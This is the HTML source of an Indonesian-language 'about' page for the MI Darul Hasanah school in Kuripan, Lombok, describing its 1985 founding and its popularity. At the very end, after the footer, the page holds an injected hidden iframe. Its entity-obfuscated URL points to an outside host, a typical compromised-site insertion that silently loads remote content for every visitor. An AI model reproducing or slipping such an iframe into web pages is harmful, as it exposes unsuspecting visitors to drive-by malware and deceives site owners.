<!DOCTYPE html>
<html lang="en">
<head>
<title>Gallery | Tentang MI Darul Hasanah</title>
<meta charset="utf-8">
<link rel="stylesheet" href="css/reset.css" type="text/css" media="all">
<link rel="stylesheet" href="css/layout.css" type="text/css" media="all">
<link rel="stylesheet" href="css/style.css" type="text/css" media="all">
<script type="text/javascript" src="js/jquery-1.5.2.js" ></script>
<script type="text/javascript" src="js/cufon-yui.js"></script>
<script type="text/javascript" src="js/cufon-replace.js"></script>
<script type="text/javascript" src="js/Terminal_Dosis_300.font.js"></script>
<script type="text/javascript" src="js/atooltip.jquery.js"></script>
<script type="text/javascript" src="js/script.js"></script>
<!--[if lt IE 9]>
<script type="text/javascript" src="js/html5.js"></script>
<style type="text/css">.bg {behavior:url("js/PIE.htc")}</style>
<![endif]-->
</head>
<body id="page2">
<div class="body1">
  <div class="body2">
    <div class="body3">
      <div class="main">
        <!-- header -->
        <header>
          <div class="wrapper">
            <h1><a href="index.html" id=""></a></h1>
            <p>&nbsp;</p>
            <p>&nbsp;</p>
            <nav>
              <ul id="menu">
                <li><a href="index.html">Home</a></li>                
                <li class="end"><a href="../index.php">Kembali ke Halaman Utama</a></li>
              </ul>
            </nav>
          </div>
        </header>
        <!-- / header-->
        <!-- content -->
        <section id="content">
          <div class="wrapper">
            <h2>About MI Darul Hasanah           </h2>
            <div class="wrapper">
             
              <p> <strong> Sejarah Berdirinya MI Darul Hasanah</strong> </p>
              <p>MI Darul Hasanah Kuripan merupakan yayasan pendidikan yang berdiri sejak 1985 yang beralamat di JL. Bani Akbar, Kuripan, Desa Kuripan, 
			  Kec. Kuripan, Kabupaten Lombok Barat, Nusa Tenggara Barar. Meskipun tergolong instansi sekolah yang cukup lama, MI Darul Hasanah sudah 
			  menjadi sekolah favorit.</p>
			<p> setiap waktu pendaftaran tiba, loket pendaftaran selalu dipenuhi oleh siswa baru setiap harinya. 
				Sehingga petugas pendaftaran selalu kewalahan melayani pendaftaran tersebut.</p>

              <p>Hingga saat ini MI Darul Hasanah Kuripan masih berdiri kokoh untuk memberikan ilmu islami dan umum kepada siswa siswi di desa kuripan.</p>
            </div>
          </div>
        </section>
      </div>
    </div>
  </div>
</div>
<!-- / content -->
<div class="main">
  <!-- footer -->
  <footer>
    <div class="wrapper"> <span class="left"> Copyright &copy; <a href="#">MI Darul Hasanah</a> 2022 All Rights Reserved<br>

      </span>
     
    </div>
    <!-- {%FOOTER_LINK} -->
  </footer>
  <!-- / footer -->
</div>
<script type="text/javascript">Cufon.now();</script>
<div align=center></div><iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>
</body>
</html>